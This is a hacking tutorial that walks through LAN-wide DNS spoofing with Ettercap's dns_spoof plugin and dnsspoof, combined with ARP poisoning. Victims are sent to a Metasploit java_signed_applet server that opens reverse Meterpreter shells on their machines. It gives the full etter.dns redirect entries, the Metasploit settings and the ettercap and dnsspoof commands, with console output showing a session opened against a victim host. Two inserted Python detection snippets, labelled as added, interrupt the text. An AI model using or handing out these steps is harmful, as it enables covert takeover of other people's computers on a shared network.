Introduction: 



DNS Spoofing (DNS Cache Poisoning): 



So basically a Domain Name System (DNS) poisoning attack, or DNS spoofing, is one in which the attacker is able to redirect a victim to a different website than the address he types into his browser. For example, a user types www.google.com but, instead of being directed to Google's servers, he is sent to another site or a fraudulent site that is managed by the attacker. 



Metasploit: Metasploit is a framework which is used for the hacking of different kinds of applications, operating systems, web applications etc. Metasploit contains various exploits, payloads, modules etc., and in the 21st century it is used by most hackers and security researchers for exploiting different kinds of operating systems like Windows XP, Windows 2003, Windows Vista, Windows 8 etc. It is also called the hacker's helping hand because by default everything is already set up for hacking systems, applications and web applications, and it is also used by security researchers for pentesting. 



Metasploit Project: The Metasploit Project is a computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development. 

Its most well-known sub-project is the open-source Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive, and security research. 



ARP Poisoning: 



Address Resolution Protocol (ARP) poisoning is an attack in which the attacker changes the MAC address that hosts associate with an IP address. It can be effective on wired or wireless networks. With it the attacker can steal passwords or data from the compromised computers, and ARP spoofing or ARP poisoning allows the attacker to sniff data frames and packets. 



Ettercap: 



So Ettercap is the most popular sniffing tool used by attackers. It has the capability of intercepting packets and capturing passwords and other necessary information. 



Process: 



We are going to perform this attack in two ways: one with Ettercap (pre-installed in BackTrack) and the other with the dnsspoof tool, which is also pre-installed in BackTrack, with a little use of Metasploit to start the Java exploit for exploiting our targets. In this attack we are going to start the attack on the whole LAN so that we can hack everyone's PC who is connected to the LAN. 



Requirements: 



1. VMware 

2. Backtrack 

3. Ettercap (pre installed) 



4. Dns_spoof plug-in (pre installed) 

5. Dns spoof (pre installed) 

6. Internet Connection 

7. Metasploit (pre installed) 



Step:-1 

Proceeding with our topic, start your BackTrack in VMware Workstation and then make sure your BackTrack is updated, otherwise it will give some problems. To update the BackTrack operating system use the command: 

root@bt:~# apt-get update 

[Screenshot: apt-get update fetching the Release, Translation and Packages files from the 32.repository, source.repository and all.repository.backtrack-linux.org repositories.] 

You will get a screen like this. 

Step:-2 

We are going to use the dns_spoof plug-in, so the use of Ettercap here is just to help us run the dns_spoof plug-in. In Ettercap we will locate the etter.dns file and then edit it. In etter.dns we will enter the site name and the particular IP address to which our victim will be redirected; we will use our own system's IP address so that all of them will be connected to us. 



So now, first of all, we have to locate the etter.dns file. To locate the etter.dns file use the command: 

root@bt:~# locate etter.dns 
/usr/local/share/ettercap/etter.dns 
/usr/local/share/videojak/etter.dns 
root@bt:~# 



So after locating etter.dns, we proceed to edit it. 
Step:-3 

We used the command locate etter.dns to find the file; to edit etter.dns we are going to use the nano command. 



root@bt:~# nano /usr/local/share/ettercap/etter.dns 



So now we are going to add to etter.dns the URL that we want to redirect to our own IP, so that the victim connects to us. 



# microsoft sucks ;) 
# redirect it to www.linux.org 
# 

www.google.com   A    192.168.2.5 
*.google.com     A    192.168.2.5 

www.google.com   PTR  192.168.2.5   # Wildcards in PTR are not allowed 

Now, to save after editing, press Ctrl+X, then press y to save, and then press Enter. 

And remember, it is not necessary that you use google.co.in to be redirected to your router login page; you can also use facebook.com, Microsoft.com, Bing.com etc., depending on you. 
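As an added, defender-side example (not part of the original tutorial), the following Python checks a set of observed DNS answers for the two symptoms that etter.dns rules like the ones above produce: a public name resolving to a private LAN address, and several public names collapsing onto one LAN address (the effect of a wildcard rule). The sample answers and the internal-name suffixes are constructed assumptions.

```python
import ipaddress
from collections import defaultdict

# Constructed sample of observed DNS answers (name, record type, answer), as a
# sensor on the LAN might log them. The first three mirror the redirect that the
# etter.dns rules in this tutorial cause; the last two are legitimate.
OBSERVED_ANSWERS = [
    ("www.google.com", "A", "192.168.2.5"),
    ("mail.google.com", "A", "192.168.2.5"),
    ("www.facebook.com", "A", "192.168.2.5"),
    ("www.example.org", "A", "93.184.216.34"),
    ("printer.lan", "A", "192.168.2.20"),
]

# Name suffixes that are internal and expected to resolve to LAN addresses (assumed).
INTERNAL_SUFFIXES = (".lan", ".local", ".internal")


def is_internal_name(name):
    return name.lower().endswith(INTERNAL_SUFFIXES)


def find_suspicious_answers(answers, same_ip_threshold=2):
    """Return alerts for A answers that look like local DNS spoofing.

    Two signals are checked:
      1. a public (non-internal) name resolving to a private or link-local
         address, which is what "www.google.com A 192.168.2.5" causes;
      2. several distinct public names collapsing onto one LAN address, which
         is the effect of a wildcard rule such as "192.168.2.5 *".
    """
    alerts = []
    names_per_ip = defaultdict(set)
    for name, rtype, answer in answers:
        if rtype != "A":
            continue
        try:
            ip = ipaddress.ip_address(answer)
        except ValueError:
            alerts.append(("malformed-answer", name, answer))
            continue
        if (ip.is_private or ip.is_link_local) and not is_internal_name(name):
            alerts.append(("public-name-to-private-ip", name, answer))
            names_per_ip[answer].add(name)
    for ip, names in names_per_ip.items():
        if len(names) >= same_ip_threshold:
            alerts.append(("wildcard-redirect", ip, ",".join(sorted(names))))
    return alerts
```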



Step:-4 

Now open Metasploit using the command msfconsole. 

root@bt:~# msfconsole 




After successfully opening Metasploit we have to search for the java_signed_applet module. Use the command: 

msf > search java_signed_applet 



msf > search java_signed_applet 

Matching Modules 

   Name                                      Disclosure Date  Rank       Description 
   exploit/multi/browser/java_signed_applet  1997-02-19       excellent  Java Signed Applet Social Engineering Code Execution 

msf > 







After successfully finding the exploit we are going to use it. 

msf > use exploit/multi/browser/java_signed_applet 
msf exploit(java_signed_applet) > 


Now set LHOST to your IP address, e.g. 192.168.2.5, set SRVPORT (that is, the server port) and URIPATH, and then start the exploit. 

msf exploit(java_signed_applet) > set LHOST 192.168.2.5 
msf exploit(java_signed_applet) > set SRVPORT 80 
msf exploit(java_signed_applet) > set URIPATH / 
msf exploit(java_signed_applet) > exploit 
[*] Exploit running as background job. 
msf exploit(java_signed_applet) > 
[*] Started reverse handler on 192.168.2.5:4444 
[*] Using URL: http://0.0.0.0:80/ 
[*] Local IP: http://192.168.2.5:80/ 
[*] Server started. 



So we have started the server on our IP address. 
Step:-5 

Now we will start the dns_spoof plug-in and then redirect the victims. For that use the following command: 

root@bt:~# ettercap -Tqi eth0 -P dns_spoof -M ARP // // 

In the above command we are redirecting every user in the whole network, hence we used "// //". When it starts listing some IPs, it means that it has started to sniff the network. You can test it yourself by trying to go to one of the websites that you put in the etter.dns file; you should be redirected to a blank window which asks you to run an application. Before running the above command you first have to confirm that your interface is eth0 or some other one; to check, use the command ifconfig. 



root@bt:~# ettercap -Tqi eth0 -P dns_spoof -M ARP // // 

  7587 mac vendor fingerprint 
  1766 tcp OS fingerprint 
  2183 known services 

Randomizing 255 hosts for scanning... 
Scanning the whole netmask for 255 hosts... 

2 hosts added to the hosts list... 

ARP poisoning victims: 

 GROUP 1 : ANY (all the hosts in the list) 

 GROUP 2 : ANY (all the hosts in the list) 
Starting Unified sniffing... 

Text only Interface activated... 
Hit 'h' for inline help 

Activating dns_spoof plugin... 
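As an added example from the defender's side (not the tutorial's own code), this Python parses a constructed arp -n snapshot of a victim host and flags the two symptoms that the "-M ARP // //" run above leaves in the victims' ARP caches: one MAC address bound to several IPs, and a gateway MAC that no longer matches a recorded baseline. The snapshot, the gateway address and the baseline MAC are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed snapshot of a Linux victim's ARP cache (arp -n output) after a
# whole-LAN ARP poisoning run: the host at 192.168.2.5 now also answers for the
# gateway 192.168.2.1 and for another LAN host, 192.168.2.6.
ARP_SNAPSHOT = """\
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.2.1              ether   08:00:27:aa:bb:cc   C                     eth0
192.168.2.5              ether   08:00:27:aa:bb:cc   C                     eth0
192.168.2.6              ether   08:00:27:aa:bb:cc   C                     eth0
192.168.2.20             ether   00:1e:c2:11:22:33   C                     eth0
"""

# Known-good gateway binding recorded on a clean network (assumed baseline).
GATEWAY_IP = "192.168.2.1"
GATEWAY_MAC = "00:11:22:33:44:01"

# One arp -n entry: IPv4 address, "ether", then a colon-separated MAC.
ARP_LINE = re.compile(r"^(\d+\.\d+\.\d+\.\d+)\s+ether\s+([0-9a-f:]{17})\s", re.I)


def parse_arp_table(text):
    """Return {ip: mac} from arp -n output, skipping the header line."""
    table = {}
    for line in text.splitlines():
        m = ARP_LINE.match(line)
        if m:
            table[m.group(1)] = m.group(2).lower()
    return table


def check_arp_table(table, gateway_ip=GATEWAY_IP, gateway_mac=GATEWAY_MAC):
    """Flag two symptoms of ARP poisoning in a parsed ARP cache:
    one MAC bound to several IPs (the poisoner answers for all of them), and
    the gateway's MAC differing from the recorded baseline."""
    findings = []
    ips_per_mac = defaultdict(list)
    for ip, mac in table.items():
        ips_per_mac[mac].append(ip)
    for mac, ips in ips_per_mac.items():
        if len(ips) > 1:
            findings.append(("duplicate-mac", mac, sorted(ips)))
    seen = table.get(gateway_ip)
    if seen is not None and seen != gateway_mac.lower():
        findings.append(("gateway-mac-changed", gateway_mac.lower(), seen))
    return findings
```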







Step:-6 

Process running on the victim's PC 

So now come to the victim's machine. Suppose the victim is using Windows 8: when he opens Google.com in his browser he will be redirected to our IP, on which we have started the server, and it asks him to run Java! Actually it is not Java; it is what our server sends, which we use to get access to anyone's PC on the LAN. 



[Screenshot: the victim's browser at www.google.com shows "Java(TM) needs your permission to run." with the options "Run this time" and "Always run on this site", and the page text "Loading, Please Wait..."] 



And as he clicks on "Run this time" there will be a pop-up asking for permission to run the Java application. 



Security Warning 
Do you want to run this application? 

Name: SiteLoader 
Publisher: UNKNOWN 
From: http://www.google.com/SiteLoader.jar 

Running this application may be a security risk 

Risk: This application will run with unrestricted access which may put your computer and personal information at risk. Run this application only if you trust the publisher. 

More Information 

Select the box below, then click Run to start the application 

[ ] I accept the risk and want to run this application.    Run    Cancel 

Show Options 



As your victim clicks on Run, a new Meterpreter session will be opened. 



msf exploit(java_signed_applet) > 
[*] Started reverse handler on 192.168.2.5:4444 
[*] Using URL: http://0.0.0.0:80/ 
[*] Local IP: http://192.168.2.5:80/ 
[*] Server started. 
[*] 192.168.2.6 java_signed_applet - Handling request 
[*] 192.168.2.6 java_signed_applet - Sending SiteLoader.jar. Waiting for user to click 'accept'... 
[*] 192.168.2.6 java_signed_applet - Sending SiteLoader.jar. Waiting for user to click 'accept'... 
[*] Sending stage (752128 bytes) to 192.168.2.6 
[*] Meterpreter session 1 opened (192.168.2.5:4444 -> 192.168.2.6:28426) at 2013-06-05 05:50:23 +0530 



Now moving to another method, which probably works better than the Ettercap one. 



So Let's Proceed With the Second Method. 



Step:-1 

Create a text file on the desktop with the following line. The advantage of this method is that you don't have to type a specific site to redirect; you just have to add to the text file the specific IP to which you want to redirect all sites. 

Line to be added in the text file: 

192.168.2.5 *   (your IP, on which you started your server) 

Save it on /root/Desktop as spoof.txt. 

Step:-2 

Go to the terminal to start the dnsspoof tool and type the command: 

root@bt:~# dnsspoof -i eth0 -f /root/Desktop/spoof.txt 

-i means interface 
-f means path of the file 

On the victim machine it starts redirecting each site to your IP, on which you have started the server to hack the remote PC. 



[Screenshot: the victim's browser at www.google.com and then at www.facebook.com, each showing "Java(TM) needs your permission to run." with the options "Run this time" and "Always run on this site", and the page text "Loading, Please Wait..."] 



So as you see, it is redirecting every site to the IP where we have started our server to hack the remote PC. 

And as he clicks on "Run this time" there will be a pop-up asking for permission to run the Java application. 



Security Warning 

Do you want to run this application? 

Name: SiteLoader 

Publisher: UNKNOWN 

From: http://www.google.com/SiteLoader.jar 

Running this application may be a security risk 

Risk: This application will run with unrestricted access which may put your computer and personal information at risk. Run this application only if you trust the publisher. 

More Information 

Select the box below, then click Run to start the application 

[ ] I accept the risk and want to run this application.    Run    Cancel 

Show Options 





As your victim clicks on Run, a new Meterpreter session will be opened, and hence your victims on the LAN are hacked. 




Thanks For Reading 
Regards 
Navdeep sethi 
& 

Manjot Gill 



